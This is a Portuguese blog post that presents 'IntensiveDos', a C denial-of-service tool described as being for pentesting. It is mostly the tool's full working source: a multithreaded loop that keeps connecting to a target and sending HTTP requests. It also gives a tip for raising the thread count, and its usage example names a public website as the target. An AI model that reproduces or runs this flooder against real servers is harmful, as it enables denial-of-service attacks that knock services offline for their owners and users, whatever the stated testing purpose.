[Ferramenta]IntensiveDos

Escrito por VonNaturAustreVe em 4 de Março de 2010 Deixe um comentário (1) Ir para os comentários

Excelente ferramenta para, código aberto, publicado por Lucas Fernando Vasconcelos de Arruda Amorim

IntensiveDos é uma ferramenta de DoS para pentesting, com ela fica muito fácil saber como o seu servidor responde e cataloga ataques do gênero. É uma ferramenta muito simples e livre de qualquer protocolo específico.

O fluxo da thread é bem simples: Abre Conexão > Escreve > Fecha Conexão. Se você precisar de algo mais específico, sinta-se livre para alterar o fonte.

Se você for abrir muitas threads é recomendável baixar o stack size, faça com um comando muito simples:

$ ulimit -s 400 (quanto menor mais threads)

Código abaixo.

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <getopt.h> #include <fcntl.h> #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <pthread.h> #include <unistd.h>

#define ERROR_MSG(msg, args...) fprintf(stderr, "<%s:%i>: " msg "\r\n", __FILE__, __LINE__, ##args)

static const struct option options[] = { {.name = "service",.has_arg = 1,.val = 's'}, {.name = "threads",.has_arg = 1,.val = 'T'}, {.name = "target",.has_arg = 1,.val = 'p'}, {.name = "help",.has_arg = 0,.val = 'h'}, {.name = "header",.has_arg = 1,.val = 'H'}, {0, 0, 0, 0} };

typedef enum { NO_ERROR, NO_TARGET, EMPTY_SERVICE, ALLOC, HOST_INFORMATION, TARGET_CONNECTION, THREAD_CREATE, THREAD_JOIN, } PROGRAM_ERROR;

char *target = NULL, *service = "http", *http_header = "GET / HTTP/1.1\r\n\r\n"; int max_threads = 30; struct addrinfo *res_attr;

void usage() { fprintf(stdout, "$program -t www.google.com -T 100\r\n"); }
PROGRAM_ERROR setHostname() {

struct addrinfo hints; PROGRAM_ERROR validate = NO_ERROR;

bzero(&hints, sizeof(hints));

hints.ai_socktype = SOCK_STREAM; hints.ai_family = PF_UNSPEC;
if (getaddrinfo(target, service, &hints, &res_attr) == -1) { validate = HOST_INFORMATION; ERROR_MSG("getaddrinfo: %s", strerror(errno)); }

return (validate);

}
PROGRAM_ERROR validateInput() {

if (target == NULL) { ERROR_MSG("Target not defined."); return (NO_TARGET); }
return (NO_ERROR);
}
PROGRAM_ERROR validateTarget() {
PROGRAM_ERROR validate = NO_ERROR;

if ((validate = validateInput()) != NO_ERROR) { ERROR_MSG("Input validation."); } else if ((validate = setHostname()) != NO_ERROR) { ERROR_MSG("Target validation."); }

return (validate);

}

PROGRAM_ERROR tryConnect() { int socket_fd;

struct addrinfo *res; for (res = res_attr; res != NULL; res = res->ai_next) { if ((socket_fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol)) == -1) continue; else if (connect(socket_fd, res->ai_addr, res->ai_addrlen) == -1) continue; break; }

if (res == NULL) { ERROR_MSG("Target connection."); return TARGET_CONNECTION; }

write(socket_fd, http_header, strlen(http_header));
close(socket_fd);

return (NO_ERROR); }

void *flood() { while (tryConnect() == NO_ERROR) { } return NULL; }
PROGRAM_ERROR waitThread(pthread_t thread) { if (pthread_join(thread, (void **)NULL) != 0) return THREAD_JOIN; return NO_ERROR; }
PROGRAM_ERROR initThread(pthread_t * thread, pthread_attr_t * thread_attr) { if (pthread_create(thread, thread_attr, (void *)&flood, NULL) != 0) { ERROR_MSG("pthread_create"); return (THREAD_CREATE); } return (NO_ERROR); }

int initProgram() {
PROGRAM_ERROR validate = NO_ERROR; pthread_t *threads = NULL; int cthread = 0;

if ((validate = validateTarget()) != NO_ERROR) { ERROR_MSG("Target validation"); return ((int)validate); }

if ((threads = (pthread_t *) malloc(sizeof(pthread_t) * max_threads)) == NULL) { ERROR_MSG("Allocating threads."); return ((int)ALLOC); }

for (cthread = 0; cthread < max_threads; cthread++) {

fprintf(stdout, "Starting thread <%i>\r\n", cthread);
if (initThread(&threads[cthread], NULL) != NO_ERROR) { ERROR_MSG("Starting thread <%i>", cthread); }

}

for (cthread = 0; cthread < max_threads; cthread++) {

fprintf(stdout, "Waiting thread <%i>\r\n", cthread);

if (waitThread(threads[cthread]) != NO_ERROR) { ERROR_MSG("Stopping thread <%i>", cthread); } }

free(threads);

return ((int)validate);

}

int main(int argc, char *argv[]) {

int c;

while ((c = getopt_long(argc, argv, "hH:T:t:p:", options, NULL)) != -1) { switch (c) { case 'T': max_threads = atoi(optarg); break; case 'p': service = optarg; break; case 't': target = optarg; break; case 'h': usage(); abort(); break; case 'H': http_header = optarg; break; } }
return (initProgram()); }

Página do criador do código.

[]‘s

Textos Relacionados:

SegurançaLinux, programação em C, Segurança

← Flisol 2010 – Vitória/ES

FLISOL 2010 DF →

Deixe um Comentário

1 Comentários.

VonNaturAustreVe via Rec6 - trackback on 4 de Março de 2010 em 14:13

Deixe um Comentário Cancelar resposta

Trackbacks e Pingbacks:

VonNaturAustreVe via Rec6 - Trackback on 2010/03/04/ 14:13

0fx66

O blog do von